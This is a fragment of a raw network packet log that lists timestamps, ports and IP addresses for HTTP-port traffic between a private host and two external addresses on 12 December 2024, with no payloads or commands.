Dec 12, 2024 16:48:37.252856016 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.252890110 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.252947092 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.254178047 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.254234076 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.254276037 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.254355907 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.257143974 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.257191896 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.257225990 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.257318020 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.260145903 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.260174990 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.260199070 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.260219097 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.262952089 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.263030052 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.263037920 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.263124943 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.265687943 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.265825987 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.265840054 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.265868902 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.268343925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.268399954 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.268434048 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.268465996 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.271008015 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.271106958 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.271131039 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.271152973 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.273571968 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.273611069 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.273698092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.273782015 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.276101112 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.276163101 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.276211023 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.276252985 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.278700113 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.278740883 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.278753996 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.278804064 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.281460047 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.281539917 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.281567097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.281666040 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.283844948 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.283899069 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.283968925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.284101009 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.286458015 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.286514997 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.286557913 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.286593914 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.289012909 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.289068937 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.289096117 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.289130926 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.291558981 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.291647911 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.291654110 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.291688919 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.294166088 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.294255972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.294281006 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.294297934 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.296698093 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.296736002 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.296741962 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.296850920 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.299448013 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.299493074 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.299519062 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.299551964 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.301846027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.301889896 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.301933050 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.302002907 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.304528952 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.304579020 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.304594994 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.304641008 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.306992054 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.307065964 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.307100058 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.307146072 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.307526112 CET	80	49933	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:37.307970047 CET	80	49938	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:37.308036089 CET	49938	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:37.308089018 CET	49938	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:37.309741020 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.309793949 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.309843063 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.309962988 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.312174082 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.312221050 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.312264919 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.312300920 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.314730883 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.314791918 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.314901114 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.315038919 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.317270994 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.317312956 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.317409039 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.317460060 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.320147991 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.320161104 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.320302963 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.322467089 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.322577953 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.322624922 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.325006008 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.325062037 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.325205088 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.325311899 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.327569962 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.327708006 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.327730894 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.327747107 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.330187082 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.330256939 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.330322981 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.330425978 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.332753897 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.332808018 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.332855940 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.332897902 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.335433006 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.335478067 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.335530043 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.335585117 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.337873936 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.337924004 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.337966919 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.340475082 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.340523005 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.340572119 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.340615988 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.342988968 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.343050957 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.427948952 CET	80	49938	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:37.429929018 CET	49938	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:37.445559025 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.445579052 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.445642948 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.446489096 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.446530104 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.446574926 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.448692083 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.448774099 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.448846102 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.450920105 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.450997114 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.450999975 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.451639891 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.453165054 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.453223944 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.453283072 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.455363035 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.455390930 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.455449104 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.457524061 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.457582951 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.457645893 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.459634066 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.459762096 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.459811926 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.461707115 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.461724043 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.461761951 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.461807013 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.463774920 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.463790894 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.463839054 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.465758085 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.465769053 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.465848923 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.467784882 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.467799902 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.467856884 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.469731092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.469810963 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.469835997 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.471632004 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.471645117 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.471678019 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.472127914 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.472172976 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.473725080 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.473736048 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.473792076 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.475634098 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.477509975 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.477590084 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.477602005 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.477634907 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.477639914 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.477710009 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.479631901 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.479686975 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.479697943 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.479773998 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.481642962 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.481657028 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.481726885 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.483503103 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.483593941 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.483640909 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.483650923 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.485636950 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.485651970 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.485686064 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.485697031 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.487638950 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.487652063 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.487694979 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.489478111 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.489540100 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.489562035 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.489614964 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.491514921 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.491566896 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.491631985 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.493721008 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.493737936 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.493787050 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.495439053 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.495491028 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.495517969 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.495558977 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.497514963 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.497531891 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.497564077 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.497574091 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.499506950 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.499528885 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.499556065 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.499581099 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.501494884 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.501516104 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.501569986 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.503366947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.503493071 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.503624916 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.503663063 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.505578995 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.505604982 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.505645990 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.507584095 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.507600069 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.507628918 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.507637024 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.509308100 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.509341955 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.509831905 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.510063887 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.511365891 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.511408091 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.512001038 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.512047052 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.513510942 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.513529062 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.513556957 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.513586044 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.515367985 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.515382051 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.515419960 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.517343998 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.517355919 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.517420053 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.519247055 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.519377947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.519382000 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.519411087 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.521330118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.521342993 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.521368980 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.521388054 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.523236036 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.523250103 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.523303032 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.523303032 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.525228024 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.525243044 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.525322914 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.527173996 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.527189016 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.527224064 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.529103041 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.529151917 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.529253006 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.529288054 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.531183004 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.531194925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.531224966 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.531266928 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.533358097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.533370972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.533412933 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.533440113 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.535115957 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.535130024 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.535166025 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.537080050 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.537161112 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.537199020 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.537429094 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.539299965 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.539329052 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.539356947 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.539393902 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.541110992 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.541126013 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.541179895 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.541179895 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.543082952 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.543103933 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.543338060 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.543338060 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.545074940 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.545294046 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.545361042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.545572042 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.547063112 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.547077894 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.547117949 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.548922062 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.549150944 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.549822092 CET	80	49938	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:37.637638092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.637653112 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.637727976 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.637877941 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.638216019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.638228893 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.638277054 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.638277054 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.639870882 CET	80	49931	31.41.244.11	192.168.2.10
